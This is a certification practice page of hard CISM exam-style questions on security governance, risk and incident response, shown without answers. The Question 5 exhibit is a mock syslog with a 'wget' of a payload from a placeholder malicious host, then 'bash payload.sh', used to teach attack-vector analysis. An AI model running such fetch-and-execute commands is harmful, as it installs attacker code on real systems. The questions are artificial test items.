Courseiva
Back to Certified Information Security Manager CISM questions

Scenario-based practice

Hard Difficulty Questions

Practise Certified Information Security Manager CISM practice questions — original exam-style scenarios covering every exam domain, with detailed explanations, wrong-answer analysis, and common exam traps.

20
scenario questions
CISM
exam code
ISACA
vendor

Scenario guide

How to approach hard difficulty questions

These are the questions most candidates get wrong. They require connecting multiple concepts, reading tricky output, or knowing edge-case behaviour that isn't on most study cards. Practising them trains you to operate under uncertainty — a necessary skill on the real exam.

Quick answer

Hard Difficulty Questions questions test whether you can apply the concept in context, not just recognise a definition.

How the topic appears in realistic exam-style scenarios.

Which detail in the question changes the correct answer.

How to eliminate plausible but wrong options.

How to connect the question back to the wider exam objective.

Related practice questions

Related CISM topic practice pages

Scenario questions usually connect to one or more exam topics. Use these links to review the underlying concepts behind the scenario.

Practice set

Practice scenarios

Question 1hardmulti select
Full question →

Which TWO of the following are incident categories in an incident management programme?

Question 2hardmultiple choice
Full question →

A company discovers a credential compromise affecting multiple user accounts. According to best practices, what is the first step the incident response team should take?

Question 3hardmultiple choice
Full question →

A large financial institution is updating its information security program to align with a new regulatory framework. The program currently has a decentralized governance model. Which of the following is the MOST significant risk of maintaining a decentralized model?

Question 4hardmultiple choice
Full question →

An organization has a mature security program with documented policies and standards. However, during a recent audit, it was found that several business units are not following the mandated data classification standard. What is the MOST likely root cause?

Question 5hardmultiple choice
Full question →

Based on the exhibit, what is the MOST likely attack vector that led to the compromise?

Exhibit

Refer to the exhibit.

Exhibit: Syslog output from a compromised server:

Mar 15 10:23:45 server1 sshd[1234]: Failed password for root from 10.0.0.50 port 2222 ssh2
Mar 15 10:23:50 server1 sshd[1234]: Failed password for root from 10.0.0.50 port 2222 ssh2
... (repeated 100 times)
Mar 15 10:25:00 server1 kernel: nf_conntrack: table full, dropping packet.
Mar 15 10:25:02 server1 sshd[1235]: Accepted publickey for admin from 10.0.0.51 port 4444 ssh2
Mar 15 10:25:10 server1 bash: sudo: whoami
Mar 15 10:25:12 server1 bash: sudo: wget http://malicious.example.com/payload.sh
Mar 15 10:25:30 server1 bash: bash payload.sh
Question 6hardmulti select
Full question →

An organization is implementing an identity and access management (IAM) program. Which THREE of the following are key components of a mature IAM program?

Question 7hardmultiple choice
Full question →

During a merger, the acquiring company's security program must integrate with the target company's program. What is the HIGHEST priority action?

Question 8hardmultiple choice
Full question →

A multinational organization handles personal data of EU residents. Which regulatory requirement must the information security program address?

Question 9hardmultiple choice
Full question →

During a review of the information security program, the security manager discovers that the program's objectives are not aligned with the organization's strategic business goals. What is the best course of action?

Question 10hardmulti select
Full question →

An organization is designing a policy exception management process. Which THREE elements are critical for this process to be effective?

Question 11hardmulti select
Full question →

An organization is designing its information security program and needs to ensure it supports business continuity. Which TWO of the following should be integrated into the program?

Question 12hardmulti select
Full question →

Which THREE of the following are challenges in implementing information security governance in a decentralized organization?

Question 13hardmultiple choice
Full question →

After a security incident, the incident response team identifies that the root cause was a phishing email that bypassed the email filter. The email contained a malicious macro that executed PowerShell commands. Which control would be MOST effective in preventing similar incidents in the future?

Question 14hardmulti select
Full question →

A security manager is evaluating the effectiveness of the security program. Which of the following would be valid indicators of a mature program? (Select two.)

Question 15hardmulti select
Full question →

Which THREE of the following are appropriate members of a crisis management team (CMT) for a major cybersecurity incident? (Select three.)

Question 16hardmultiple choice
Full question →

A bank detects unusual activity on a server containing sensitive financial data. The activity appears to be from a compromised vendor account that has legitimate remote access to the server for maintenance. The incident manager must decide on containment while maintaining business operations. The vendor account has elevated privileges and is used for routine updates. Disabling the account would delay critical maintenance. What is the BEST course of action?

Question 17hardmultiple choice
Full question →

An organization uses the ISO 31000 risk management framework. During the risk evaluation phase, it determines that a certain risk has a low likelihood but very high impact. The organization's risk appetite is moderate. Which of the following is the MOST appropriate risk treatment decision?

Question 18hardmultiple choice
Full question →

An organization is implementing a security controls framework and must decide on prioritization. According to defense-in-depth principles, which approach should be taken first?

Question 19hardmultiple choice
Full question →

Match the following security program components with their primary purpose by dragging each component to the correct description.

Question 20hardmultiple choice
Full question →

Refer to the exhibit. An analyst observes the network traffic between three internal hosts and a web server. Which of the following is the MOST likely interpretation of this traffic?

Exhibit

Refer to the exhibit.

```
[SYN] 12:01:00.001 192.168.1.10:12345 -> 10.0.0.1:80
[SYN-ACK] 12:01:00.002 10.0.0.1:80 -> 192.168.1.10:12345
[ACK] 12:01:00.003 192.168.1.10:12345 -> 10.0.0.1:80
[GET /index.html] 12:01:00.004 192.168.1.10:12345 -> 10.0.0.1:80
[SYN] 12:01:00.005 192.168.1.11:23456 -> 10.0.0.1:80
[SYN-ACK] 12:01:00.006 10.0.0.1:80 -> 192.168.1.11:23456
[ACK] 12:01:00.007 192.168.1.11:23456 -> 10.0.0.1:80
[GET /login.php] 12:01:00.008 192.168.1.11:23456 -> 10.0.0.1:80
[SYN] 12:01:00.009 192.168.1.12:34567 -> 10.0.0.1:80
[SYN-ACK] 12:01:00.010 10.0.0.1:80 -> 192.168.1.12:34567
[ACK] 12:01:00.011 192.168.1.12:34567 -> 10.0.0.1:80
[GET /admin.php] 12:01:00.012 192.168.1.12:34567 -> 10.0.0.1:80
```

These CISM practice questions are part of Courseiva's free ISACA certification practice question bank. Courseiva provides original exam-style CISM questions with detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics.